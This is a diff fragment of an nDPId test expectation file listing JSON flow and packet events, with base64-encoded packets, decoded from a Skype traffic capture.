-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714902,"flow_last_seen":1431969714902,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431969714902,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714902,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9lxAAEAG47DAqAEiUVNNjcPEROe9aVYgAAAAALAC\/\/\/WyQAAAgQFtAEDAwUBAQgKPiOlLwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714165,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714165,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"91.190.216.125","src_port":50111,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1691,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":1,"flow_last_seen":1431969714165,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714165,"pkt":"0NQSxnP1PBXCt3IOCABFAABAXlBAAEAG5mHAqAEiW77YfcO\/AbtO2k10AAAAALAC\/\/\/+rQAAAgQFtAEDAwUBAQgKPiOiXAAAAAAEAgAA"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1695,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":2,"flow_last_seen":1431969714207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714207,"pkt":"PBXCt3IO0NQSxnP1CABFCAA0n3BAAPUG8ERbvth9wKgBIgG7w79kPKOqTtpNdYASH\/7vYgAAAgQFoAEDAwQBAQQC"} +00452{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1696,"source":"skype.pcap","alias":"nDPId-test","flow_id":242,"flow_packet_id":3,"flow_last_seen":1431969714207,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1431969714207,"pkt":"0NQSxnP1PBXCt3IOCABFAAAofgBAAEAGxsnAqAEiW77YfcO\/AbtO2k11ZDyjq1AQIAAwHAAA"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"76.167.161.6","src_port":50112,"dst_port":20274,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1703,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMR1AAEAGWiPAqAEiTKehBsPATzJsmy7uAAAAALAC\/\/\/3pQAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50113,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1704,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAtnFAAEAGcsPAqAEiR+4Hy8PBSU++p132AAAAALAC\/\/8aaAAAAgQFtAEDAwUBAQgKPiOjPwAAAAAEAgAA"} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714398,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714398,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50114,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1705,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":1,"flow_last_seen":1431969714398,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714398,"pkt":"0NQSxnP1PBXCt3IOCABFAABAOeJAAEAGfjbAqAEiBfi63cPCeSJZV8ukAAAAALAC\/\/9xGAAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} 
+00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714399,"flow_last_seen":1431969714399,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714399,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50115,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1706,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":1,"flow_last_seen":1431969714399,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714399,"pkt":"0NQSxnP1PBXCt3IOCABFAABAMoNAAEAGzS3AqAEiVh8jHsPD6OVaW8KbAAAAALAC\/\/9Q8QAAAgQFtAEDAwUBAQgKPiOjQAAAAAAEAgAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1718,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":2,"flow_last_seen":1431969714471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714471,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OCJAAHEGlpJWHyMewKgBIujlw8M6uTMdWlvCnKASIADQQwAAAgQFrAEDAwgEAggKABoDtj4jo0A="} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1719,"source":"skype.pcap","alias":"nDPId-test","flow_id":246,"flow_packet_id":3,"flow_last_seen":1431969714471,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714471,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0C5pAAEAG9CLAqAEiVh8jHsPD6OVaW8KcOrkzHoAQECwOlQAAAQEICj4jo4gAGgO2"} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1721,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":2,"flow_last_seen":1431969714516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714516,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzQFAAHIGuRYF+LrdwKgBInkiw8JDt9yLWVfLpbASRBDtIwAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1722,"source":"skype.pcap","alias":"nDPId-test","flow_id":245,"flow_packet_id":3,"flow_last_seen":1431969714516,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714516,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0avhAAEAGTSzAqAEiBfi63cPCeSJZV8ulQ7fcjIAQECx\/8gAAAQEICj4jo7UAAAAA"} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1730,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":2,"flow_last_seen":1431969714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714616,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9bZAAHMGAH5H7gfLwKgBIklPw8GfDHVAvqdd97AS\/\/\/meAAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} 
+00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1731,"source":"skype.pcap","alias":"nDPId-test","flow_id":244,"flow_packet_id":3,"flow_last_seen":1431969714616,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714616,"pkt":"0NQSxnP1PBXCt3IOCABFAAA092tAAEAGMdXAqAEiR+4Hy8PBSU++p133nwx1QYAQECw01gAAAQEICj4jpBYAAAAA"} +00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1742,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":2,"flow_last_seen":1431969714686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714686,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8AABAAC4GnURMp6EGwKgBIk8yw8Ds1RmabJsu76AScSD0JwAAAgQFrAQCCAq+oN5GPiOjPwEDAwc="} +00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1743,"source":"skype.pcap","alias":"nDPId-test","flow_id":243,"flow_packet_id":3,"flow_last_seen":1431969714686,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714686,"pkt":"0NQSxnP1PBXCt3IOCABFAAA08xxAAEAGmC\/AqAEiTKehBsPATzJsmy7v7NUZm4AQECyCxgAAAQEICj4jpFm+oN5G"} 
+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969714902,"flow_last_seen":1431969714902,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969714902,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50116,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1755,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":1,"flow_last_seen":1431969714902,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969714902,"pkt":"0NQSxnP1PBXCt3IOCABFAABA9lxAAEAG47DAqAEiUVNNjcPEROe9aVYgAAAAALAC\/\/\/WyQAAAgQFtAEDAwUBAQgKPiOlLwAAAAAEAgAA"} 00658{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1758,"source":"skype.pcap","alias":"nDPId-test","flow_id":238,"flow_packet_id":2,"flow_last_seen":1431969714913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":207,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":207,"pkt_l4_len":173,"thread_ts_msec":1431969714913,"pkt":"PBXCt3IOxCwDBkn+CABFAADBTP4AAP8Ryy3AqAFc4AAA+xTpFOkArS1IAAAAAAAEAAMAAAAAC19hZnBvdmVydGNwBF90Y3AFbG9jYWwAAAwAAQRfc21iwBgADAABBF9yZmLAGAAMAAEGX2FkaXNrwBgADAABwAwADAABAAAPuwAWE0x1Y2HigJlzIE1hY0Jvb2tQcm\/ADMAMAAwAAQAADA0AEA1MdWNh4oCZcyBpTWFjwAzAKAAMAAEAAAwNABANTHVjYeKAmXMgaU1hY8Ao"} 
00691{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1759,"source":"skype.pcap","alias":"nDPId-test","flow_id":239,"flow_packet_id":2,"flow_last_seen":1431969714913,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":227,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":227,"pkt_l4_len":173,"thread_ts_msec":1431969714913,"pkt":"MzMAAAD7xCwDBkn+ht1gAU9NAK0R\/\/6AAAAAAAAAxiwD\/\/4GSf7\/AgAAAAAAAAAAAAAAAAD7FOkU6QCtv5gAAAAAAAQAAwAAAAALX2FmcG92ZXJ0Y3AEX3RjcAVsb2NhbAAADAABBF9zbWLAGAAMAAEEX3JmYsAYAAwAAQZfYWRpc2vAGAAMAAHADAAMAAEAAA+7ABYTTHVjYeKAmXMgTWFjQm9va1Byb8AMwAwADAABAAAMDQAQDUx1Y2HigJlzIGlNYWPADMAoAAwAAQAADA0AEA1MdWNh4oCZcyBpTWFjwCg="} -00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1760,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":2,"flow_last_seen":1431969714962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969714962,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8ec1AAHQGLERRU02NwKgBIkTnw8TZuiW6vWlWIaASIAAuPAAAAgQFrAEDAwgEAggKALqZVz4jpS8="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1761,"source":"skype.pcap","alias":"nDPId-test","flow_id":247,"flow_packet_id":3,"flow_last_seen":1431969714962,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969714962,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0PRZAAEAGnQPAqAEiUVNNjcPEROe9aVYh2bolu4AQECxsmQAAAQEICj4jpWsAuplX"} 
-00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715510,"flow_last_seen":1431969715510,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715510,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"71.238.7.203","src_port":50117,"dst_port":18767,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1789,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":1,"flow_last_seen":1431969715510,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715510,"pkt":"0NQSxnP1PBXCt3IOCABFAABA3TdAAEAGS\/3AqAEiR+4Hy8PFSU9+U7C+AAAAALAC\/\/8DrQAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"5.248.186.221","src_port":50118,"dst_port":31010,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1790,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAKktAAEAGjc3AqAEiBfi63cPGeSKEqukYAAAAALAC\/\/8kCwAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969715511,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969715511,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"86.31.35.30","src_port":50119,"dst_port":59621,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1791,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":1,"flow_last_seen":1431969715511,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715511,"pkt":"0NQSxnP1PBXCt3IOCABFAABAylVAAEAGNVvAqAEiVh8jHsPH6OX+Qs16AAAAALAC\/\/+d5AAAAgQFtAEDAwUBAQgKPiOnggAAAAAEAgAA"} 
-00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1793,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":2,"flow_last_seen":1431969715594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969715594,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8OFdAAHEGll1WHyMewKgBIujlw8c9omIw\/kLNe6ASIADqygAAAgQFrAEDAwgEAggKABoEJj4jp4I="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1794,"source":"skype.pcap","alias":"nDPId-test","flow_id":250,"flow_packet_id":3,"flow_last_seen":1431969715594,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715594,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0XmBAAEAGoVzAqAEiVh8jHsPH6OX+Qs17PaJiMYAQECwpEwAAAQEICj4jp9MAGgQm"} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1797,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":2,"flow_last_seen":1431969715635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715635,"pkt":"PBXCt3IO0NQSxnP1CABFAABAzWBAAHIGuLcF+LrdwKgBInkiw8ZD4gQbhKrpGbASRBB8ngAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1798,"source":"skype.pcap","alias":"nDPId-test","flow_id":249,"flow_packet_id":3,"flow_last_seen":1431969715635,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715635,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0wlBAAEAG9dPAqAEiBfi63cPGeSKEqukZQ+IEHIAQECwLJwAAAQEICj4jp\/sAAAAA"} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1809,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":2,"flow_last_seen":1431969715739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969715739,"pkt":"PBXCt3IO0NQSxnP1CABFAABA9cxAAHMGAGhH7gfLwKgBIklPw8W6q5ekflOwv7AS\/\/+V\/QAAAgQFrAEDAwABAQgKAAAAAAAAAAABAQQC"} -00468{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1810,"source":"skype.pcap","alias":"nDPId-test","flow_id":248,"flow_packet_id":3,"flow_last_seen":1431969715739,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969715739,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0iyZAAEAGnhrAqAEiR+4Hy8PFSU9+U7C\/uquXpYAQECzgEQAAAQEICj4jqF8AAAAA"} -00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716015,"flow_last_seen":1431969716015,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716015,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.83.77.141","src_port":50121,"dst_port":17639,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
-00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1836,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":1,"flow_last_seen":1431969716015,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716015,"pkt":"0NQSxnP1PBXCt3IOCABFAABAfGpAAEAGXaPAqAEiUVNNjcPJROc2X9vGAAAAALAC\/\/\/T7gAAAgQFtAEDAwUBAQgKPiOpaQAAAAAEAgAA"} -00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1841,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":2,"flow_last_seen":1431969716076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1431969716076,"pkt":"PBXCt3IO0NQSxnP1CABFAAA8egBAAHQGLBFRU02NwKgBIkTnw8naYr1gNl\/bx6ASIACSowAAAgQFrAEDAwgEAggKALqZxj4jqWk="} -00467{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1842,"source":"skype.pcap","alias":"nDPId-test","flow_id":251,"flow_packet_id":3,"flow_last_seen":1431969716076,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1431969716076,"pkt":"0NQSxnP1PBXCt3IOCABFAAA0B4NAAEAG0pbAqAEiUVNNjcPJROc2X9vH2mK9YYAQECzRAwAAAQEICj4jqaIAupnG"} 
-00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1431969716182,"flow_last_seen":1431969716182,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1431969716182,"l3_proto":"ip4","src_ip":"192.168.1.34","dst_ip":"81.133.19.185","src_port":50122,"dst_port":44431,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1857,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":1,"flow_last_seen":1431969716182,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716182,"pkt":"0NQSxnP1PBXCt3IOCABFAABAI3FAAEAG8D7AqAEiUYUTucPKrY8W93X3AAAAALAC\/\/8pggAAAgQFtAEDAwUBAQgKPiOqBgAAAAAEAgAA"} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1877,"source":"skype.pcap","alias":"nDPId-test","flow_id":252,"flow_packet_id":2,"flow_last_seen":1431969716265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":78,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":78,"pkt_l4_len":44,"thread_ts_msec":1431969716265,"pkt":"PBXCt3IO0NQSxnP1CABFAABAivNAADAGmLxRhRO5wKgBIq2Pw8rX0EaLFvd1+LAS\/\/\/WdwAAAgQFrAEDAwUBAQgKArAx9T4jqgYEAgAA"} 
